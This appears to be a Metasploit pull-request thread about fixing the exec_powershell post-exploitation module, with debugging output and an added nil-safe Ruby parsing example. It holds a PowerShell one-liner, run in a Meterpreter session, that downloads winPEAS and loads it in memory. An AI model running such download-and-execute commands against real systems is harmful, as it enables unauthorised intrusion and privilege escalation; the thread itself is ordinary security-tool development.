Remove errant write_log call and swap to the all-in-one psh_exec rather than execute_script #20412
Win 10x64 21H2 with admin Meterpreter Session
As a question to the powershellers out there..... what is the difference between this script and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/exec_powershell.rb ?

So I think
The module will fail if the Powershell script is taking too long and the timeout is not increased:

```
msf post(windows/manage/powershell/exec_powershell) > run
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
[*] Compressing script contents.
[+] Compressed size: 617
[*] Executing the script.
[+] Compressed size: 2608
[-] Post failed: NoMethodError undefined method `strip' for nil:NilClass
[-] Call stack:
[-] /home/ms/git/metasploit-framework/lib/msf/core/post/windows/powershell.rb:356:in `psh_exec'
[-] /home/ms/git/metasploit-framework/modules/post/windows/manage/powershell/exec_powershell.rb:120:in `run'
[*] Post module execution completed
```
Should we adjust this with a rescue block, fixing the library where the fail happens (`ps_output = ps_output[/#{start}(.*?)#{stop}/m, 1].strip` in lib/msf/core/post/windows/powershell.rb - strip is not defined for nil) or leave it up to the user?
With the timeout increased, it works as expected:

```
msf post(windows/manage/powershell/exec_powershell) > run verbose=true
[*] $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
[*] Compressing script contents.
[+] Compressed size: 613
[*] Executing the script.
[+] Compressed size: 2592
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
[SNIPPED]
```
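The failure mode described in the review comment above, as an added example that is not part of this PR or of metasploit-framework's own code: the library slices the PowerShell output between a start and a stop marker and calls `strip` on the capture, so when the script times out and the markers never arrive the capture is `nil` and `strip` raises `NoMethodError`. The function names (`extract_unsafe`, `extract_marked_output`), the marker strings and the sample outputs below are all constructed for this example; the real library's markers and exact slicing code are not reproduced here.

```ruby
# Added example, not metasploit-framework code. Shows why
# `ps_output[/#{start}(.*?)#{stop}/m, 1].strip` raises on a timed-out
# script, and one nil-safe way to do the same extraction.
# Marker strings are constructed for the example, not the library's real ones.
START_MARKER = 'BEGIN_PSH_OUTPUT'.freeze
STOP_MARKER  = 'END_PSH_OUTPUT'.freeze

def marker_regex(start, stop)
  # Regexp.escape is used here so marker text cannot be misread as regex syntax;
  # the line quoted in the review interpolates the markers unescaped.
  /#{Regexp.escape(start)}(.*?)#{Regexp.escape(stop)}/m
end

# Mirrors the fragile behaviour: String#[] with a capture index returns nil
# when the pattern does not match, and nil has no #strip method.
def extract_unsafe(ps_output, start = START_MARKER, stop = STOP_MARKER)
  ps_output[marker_regex(start, stop), 1].strip
end

# Hardened version: never calls a method on nil, and reports *why* there is
# no body so a caller can distinguish an empty result from a timeout where
# the stop marker never arrived.
def extract_marked_output(ps_output, start = START_MARKER, stop = STOP_MARKER)
  return { status: :no_output, body: nil } if ps_output.nil? || ps_output.empty?

  body = ps_output[marker_regex(start, stop), 1]
  return { status: :markers_missing, body: nil } if body.nil?

  { status: :ok, body: body.strip }
end

# Constructed sample outputs: one complete run, one cut off by a timeout.
SAMPLE_COMPLETE = "loader noise\nBEGIN_PSH_OUTPUT\n  hello from powershell  \nEND_PSH_OUTPUT\ntrailer".freeze
SAMPLE_TIMEOUT  = "BEGIN_PSH_OUTPUT\npartial output, stop marker never written".freeze

if __FILE__ == $PROGRAM_NAME
  p extract_marked_output(SAMPLE_COMPLETE)   # {:status=>:ok, :body=>"hello from powershell"}
  p extract_marked_output(SAMPLE_TIMEOUT)    # {:status=>:markers_missing, :body=>nil}
  begin
    extract_unsafe(SAMPLE_TIMEOUT)
  rescue NoMethodError => e
    puts "unsafe version raised: #{e.class}: #{e.message}"
  end
end
```

Returning a status instead of rescuing `NoMethodError` at the call site keeps the timeout case visible to the module, which can then tell the user to raise the timeout rather than reporting a generic Ruby error.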
In playing with #20208, I wondered why we did not just run the PowerShell script directly in memory, so I tried it, and it failed:

I pulled the `write_to_log` out and replaced the call to `execute_script` with `psh_exec` since that method seemed to do everything automagically. If anyone knows where the `write_to_log` method went or a better way to get `execute_script` to work. The script I used for testing was WinPEASS: